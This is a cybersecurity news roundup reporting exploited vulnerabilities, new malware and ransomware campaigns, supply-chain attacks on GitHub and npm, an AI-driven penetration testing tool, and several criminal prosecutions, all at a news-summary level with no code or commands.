Threat actors linked to the Akira ransomware group have ramped up attacks targeting SonicWall devices, exploiting a known high-risk vulnerability to gain initial access to networks. The attacks are leveraging CVE-2024-40766, an improper access control issue affecting SonicWall firewalls. The flaw stems from improper password handling during local user account migration. SonicWall has confirmed the exploitation and warned customers of escalating brute-force attempts.
Microsoft has released its September 2025 Patch Tuesday security updates, addressing more than 80 vulnerabilities, including two publicly disclosed flaws, one in Windows SMB Server and another in the Newtonsoft.Json library used by Microsoft SQL Server.
The US Cybersecurity and Infrastructure Security Agency (CISA) has added a critical vulnerability (CVE-2025-5086) in Dassault Systèmes DELMIA Apriso Manufacturing Operations Management (MOM) software to its Known Exploited Vulnerabilities (KEV) catalog. The flaw, which affects versions from Release 2020 through Release 2025, involves deserialization of untrusted data, potentially allowing remote code execution.
Samsung has patched a critical remote code execution vulnerability, tracked as CVE-2025-21043, which was actively exploited in zero-day attacks targeting its Android devices. The flaw affects devices running Android 13 or later and was reported by security teams at Meta and WhatsApp on August 13. It stems from an out-of-bounds write issue in libimagecodec.quram.so, a closed-source image parsing library by Quramsoft, allowing attackers to remotely execute malicious code.
A high-risk security flaw in SAP S/4HANA, a widely-used Enterprise Resource Planning (ERP) platform, is now under active exploitation in the wild. The vulnerability, tracked as CVE-2025-42957, was patched by SAP in its August 2025 security update. However, cybersecurity experts warn that attackers are now leveraging the flaw to compromise vulnerable systems.
Cybersecurity firm Kroll has discovered a new espionage campaign using a malware strain dubbed Gonepostal, attributed to the Russian-linked hacking group KTA007, also known as Fancy Bear, APT28, and Pawn Storm. The Gonepostal malware targets Microsoft Outlook and enables email-based command-and-control (C2) communication, effectively turning the email client into a backdoor.
ESET Research has spotted a new ransomware strain named HybridPetya on VirusTotal, which mimics the infamous Petya/NotPetya malware but is adapted for modern UEFI-based systems. HybridPetya encrypts the Master File Table on NTFS partitions and can install a malicious EFI application onto the EFI System Partition. It can bypass UEFI Secure Boot on outdated systems by exploiting CVE-2024-7344 using a specially crafted cloak.dat file. Unlike the original NotPetya, HybridPetya currently shows no signs of spreading in the wild and lacks aggressive network propagation capabilities.
APT37 (aka ScarCruft, Ruby Sleet, and Velvet Chollima) has been observed deploying a coordinated malware campaign targeting Windows systems, using a single C2 server to manage multiple threats, according to a new report from ZScaler ThreatLabz. The campaign, active since June 2025, includes a new Rust-based backdoor named Rustonotto (aka CHILLYCHINO) alongside Chinotto, a PowerShell backdoor in use since 2019, and FadeStealer, a surveillance tool first seen in 2023. FadeStealer is capable of keylogging, screen/audio capture, device monitoring, and data exfiltration via encrypted RAR files.
In a separate report, ZScaler looks into a malware campaign targeting Chinese-speaking users active since early May 2025. The campaign involves three types of Remote Access Trojans (RATs): ValleyRAT, FatalRAT, and a new RAT dubbed ‘kkRAT’. The latter shares code similarities with Ghost RAT and Big Bad Wolf, both commonly associated with China-based cybercriminal groups.
A previously unknown fileless malware framework called EggStreme has been used to compromise a Philippines-based military company. According to Bitdefender, the multi-stage toolset enables persistent and stealthy espionage, using DLL sideloading and in-memory code injection. It involves a backdoor called ‘EggStremeAgent’, capable of system reconnaissance, lateral movement, and data theft via a keylogger. While the campaign’s goals align with known Chinese APT operations, Bitdefender has not found sufficient evidence that would allow to link the activity to a specific group.
Bitdefender has also observed a malvertising campaign that distributes fake ‘Meta Verified’ browser extensions called SocialMetrics Pro. The extensions, advertised through malicious ads and hosted on the legitimate cloud platform Box, falsely promise users a verified blue check badge on Facebook and Instagram. In reality, the extensions are designed to steal sensitive data by collecting session cookies and IP addresses, which are then sent to a Telegram bot controlled by the attackers.
A new malicious campaign is using ConnectWise ScreenConnect, a legitimate remote access tool, to deploy AsyncRAT, a remote access trojan. Attackers gain access through trojanized ScreenConnect installers sent via phishing emails, often disguised as financial documents. Once inside, they manually execute a multi-layered VBScript and PowerShell loader that fetches obfuscated .NET components, ultimately delivering AsyncRAT. Persistence is maintained through a fake ‘Skype Updater’ scheduled task.
Straiker’s AI Research (STAR) team has detailed Villager, a Chinese-developed AI-powered penetration testing framework similar to Cobalt Strike. Created by the Cyberspike red-team project, Villager combines Kali Linux toolsets with DeepSeek AI models to automate hacking workflows, significantly lowering the barrier for cyber attackers. The tool, available on PyPI.org, has been downloaded approximately 10,000 times in two months. The researchers warn that Villager could follow the path of Cobal Strike and become the next go-to tool for cybercriminals.
Kharon Research released a report on the inner workings of the US-sanctioned Chinese companies linked to the Salt Typhoon state-sponsored cyber espionage group. Additionally, cyber threat intelligence firm Silent Push has identified 45 previously unreported domains used by Salt Typhoon.
A threat actor accidentally exposed their operations by installing Huntress security software on their own device after clicking a Google ad. During a free trial, Huntress logged their activity, confirming their identity through device and browser data. Over three months, the actor tested security tools, used automation platforms, and explored AI for phishing and data management. Logs showed research into Evilginx servers, proxy services, financial targets, and identity-focused tools, along with frequent use of Google Translate and access to dark web forums like STYX. For more details, read the full report here.
Recorded Future’s Insikt Group has uncovered a new threat actor, dubbed ‘TAG-150’, active since at least March 2025. TAG-150 maintains a large and complex infrastructure, including both victim-facing Tier 1 servers used to control various malware and multi-layered backend servers for support and resilience. The group has deployed several likely self-developed malware families, including CastleLoader, CastleBot, and the recently discovered CastleRAT, a remote access trojan (RAT) capable of gathering system data, executing commands, and deploying additional malware.
Cybersecurity researchers at Arctic Wolf have spotted a new sophisticated malware campaign that leverages Google Ads, GitHub infrastructure, and GPU-based decryption to bypass traditional defenses. The attack technique has been dubbed “GPUGate.” The threat actors behind GPUGate used malvertising to display fake ads at the top of Google search results, tricking users into downloading what appeared to be GitHub Desktop. Instead of being taken to a legitimate GitHub release, users were redirected via links embedded in a compromised GitHub repository to a malicious domain.
A major supply chain attack dubbed ‘GhostAction’ has compromised more than 320 GitHub users and exposed thousands of secrets across the software development ecosystem. The attack, which took place earlier this month, saw 327 GitHub accounts compromised, with malicious GitHub Actions workflows injected into 817 repositories. The workflows were designed to exfiltrate secrets from continuous integration and deployment (CI/CD) pipelines, including PyPI, npm, and DockerHub tokens, via HTTP POST requests to a remote server controlled by the attackers.
In an unrelated incident, threat actors compromised a maintainer's account and injected malware into several popular NPM packages, collectively downloaded over 2.6 billion times per week. The malware targets users accessing affected applications via the web. It silently monitors for crypto wallet addresses and transactions involving Ethereum, Bitcoin, Solana, Tron, Litecoin, and Bitcoin Cash.
Also, cybersecurity researchers at Akamai have discovered a new variant of a cryptojacking campaign targeting exposed Docker APIs. The attackers use the TOR network for anonymity and exploit misconfigured Docker instances to install an XMRig cryptocurrency miner.
Researchers from ETH Zurich have discovered VMScape, a new Spectre-like attack that allows a malicious VM to leak cryptographic keys from an unmodified QEMU hypervisor on AMD and Intel CPUs. The attack bypasses existing mitigations and doesn't require host compromise. It affects all AMD CPUs from Zen 1 to Zen 5 and Intel's Coffee Lake, but not newer architectures like Raptor Cove or Gracemont.
The US Department of Justice has charged Ukrainian national Volodymyr Viktorovich Tymoshchuk, accused of being a key administrator behind major ransomware operations including LockerGoga, MegaCortex, and Nefilim. Tymoshchuk allegedly helped execute attacks that affected hundreds of companies globally, causing millions in damages. He is currently remains at large. He was placed on EU’s Most Wanted list, with the US authorities offering a reward of up to $10 million for information about him.
In an unrelated case, Liridon Masurica of Kosovo pleaded guilty to conspiracy for running the criminal marketplace BlackDB.cc and faces up to 10 years in prison.
Separately, an employee at a multinational DVD company was sentenced to over four years for stealing and selling pre-release blockbuster films.
Finnish cybercriminal Aleksanteri Kivimäki, convicted of over 20,000 counts of attempted extortion after hacking the Vastaamo psychotherapy center, has been released from custody pending appeal. The Helsinki Court of Appeal ordered his release due to his lengthy pretrial detention, though his six-year, three-month sentence remains in place during the appeal process. Kivimäki, previously convicted as a teenager for his involvement with the hacking gang Lizard Squad, was arrested in France in 2023 and extradited to Finland. His case is one of Europe’s most significant data privacy breaches.